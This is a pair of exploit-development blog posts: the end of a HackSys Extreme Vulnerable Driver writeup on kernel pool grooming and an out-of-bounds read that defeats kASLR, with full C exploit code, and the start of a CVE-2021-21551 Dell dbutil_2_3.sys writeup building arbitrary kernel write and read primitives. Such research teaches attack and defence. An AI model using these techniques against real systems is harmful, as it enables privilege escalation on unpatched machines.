If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some β€œnew” or β€œnovel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is part of a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides it’s obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, which is the function we have been analyzing thus far, is passed an argument called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the β€œtl;dr” here in a second.

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a β€œsecure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag will allocate a pool chunk based on the size provided here by the client. The issue is that the developer of this driver is not just copying the output to the UserOutputBuffer parameter but that the call to RtlCopyMemory allows the client to decide the amount of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer part, as we fully control this buffer via our call to DeviceIoControl, and can make it a large buffer to avoid it being overflowed. The issue is the second and third parameter.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines.

If the size of the copy operation is greater than the allocation size of0x70 bytes, the number of bytes after 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx

Per the __fastcall calling convention the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer) parameter and RDX (the size specified by us). Dumping the RCX register, we can see the 70 bytes that will hold the allocation.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by ensuring the offset to the PoolTag member of _POOL_HEADER is successful.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different than the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation only values of 0x41 were bubbled back up to user mode. However, recall this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, which shows that the direct next chunk after the Hack chunk is 0xffffe48f4254fb00, which contains a value of 6c54655302081b00 and so on, which is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an β€œout-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, that the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called β€œpool grooming”

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or no way to force the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size. Where does this leave us? Well, what we can do is to first make sure the kLFH is enabled and then also to β€œfill” all of the β€œholes”, or freed allocations currently, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the the kLFH bucket is ideal, as it gives us a β€œclean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for β€œspraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably we can see several Even tags. This tag is actually a tag used for an object created with a call to CreateEvent, a Windows API, which can actually be invoked from user mode. The prototype can be seen below.

This function returns a handle to the object, which is a technically a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary amount of objects, 5000.

After executing the newly updated code and after setting a breakpoint on the copy location, with the vulnerable pool chunk, take a look at the state of the page which contains the pool chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can see now that there are many free objects and a few event objects. This is reminiscent behavior of us getting a new page for our vulnerable chunk to go, as our vulnerable chunk is prefaces with several event objects, with our vulnerable chunk being allocated directly after. We can also perform additional analysis by inspecting the previous page (recall that for our purposes on this 64-bit Windows 10 install a page is 0x1000 bytes, of 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool from spraying, the goal now is to now allocate the entire new page with event objects and then free every other object in the page we control in the new page. This will allow us to then, right after freeing every other object, to create another object of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations that are being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):


So what kind of object would we like to place in the β€œholes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. This is the hardest/most tedious part of pool corruption, is finding something that is not only the size needed, but also contains valuable information. This especially bodes true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit β€œsimplified”. It will take a bit of reverse engineering/debugging to calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that perform the before sentiments, but for the given size pool chunk you need
  4. If you have made it this far, narrow this down further by finding an object with all of the before attributes and with an interesting member, such as a function pointer

However, slightly easier because we can use the source code, let’s find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionCallback and is defined as such in Common.h: typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which a function located in UseAfterFreeNonPagedPoolNx.c shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated adjacent to any free slots within the page our event objects live! Let’s update our POC to perform the following:

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the memcpy routine (RtlCopyMemory) from the original routine for the out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the target pool chunk used in the copy operation, which will be the chunk bubbled back up to user mode, which could showcase that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent with the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry to us because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, it will result in an information leak. The reason for this is because the kLFH has a bit of β€œfunkiness” going on. This isn’t necessarily due to any sort of kLFH β€œrandomization”, I found out after talking with my colleague Yarden Shafir, where the free chunks will be/where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly. This is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:


Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for the one of the last memory address in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading from the address 0x1000 bytes away, which may reside in a page which is not currently committed to memory, causing a DOS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in an adjacent block to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop is instituted to parse the output for anything that is sign extended (a kernel-mode address). Since the output buffer will be returned in an unsigned long long array, the size of a 64-bit address, and since the address we want to leak from is the first member of the adjacent chunk, after the leaked _POOL_HEADER, it should be placed into a clean 64-bit variable, and therefore easily parsed. Once we have leaked the address of the pointer to the function, we then can calculate the distance from the function to the base of HEVD, add the distance, and then obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks both have Hack tags. However, if we take the adjacent chunk to the current chunk, which is a vulnerable chunk we can read past and denoted by an asterisk, and after parsing it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can see clearly that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i <= 5000; i++)
    // Create the objects
    HANDLE tempHandle = CreateEventA(

    // Assign the handles to the array
    eventObjects[i] = tempHandle;

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i <= 5000; i += 2)
      BOOL tempHandle1 = CloseHandle(

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
      BOOL tempHandle2 = CloseHandle(

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i <= 100; i++)
      // Return buffer
      DWORD bytesReturned1;



    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i <= 100; i++)
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] + 0x880CC;

void main(void)
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(

  // Error handling
  if (drvHandle == (HANDLE)-1)
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());


Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

Exploit Development: CVE-2021-21551 - Dell β€˜dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00


Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being a weaponized exploit. I wanted to take this blog post to showcase just a few of the β€œchecks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a β€œrepresentation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we β€œcan control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can β€œbypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the β€œwhat” (our data) and the β€œwhere” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998 43434343`43434343

What if we could just pass our own data as such:

43434343`43434343 DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

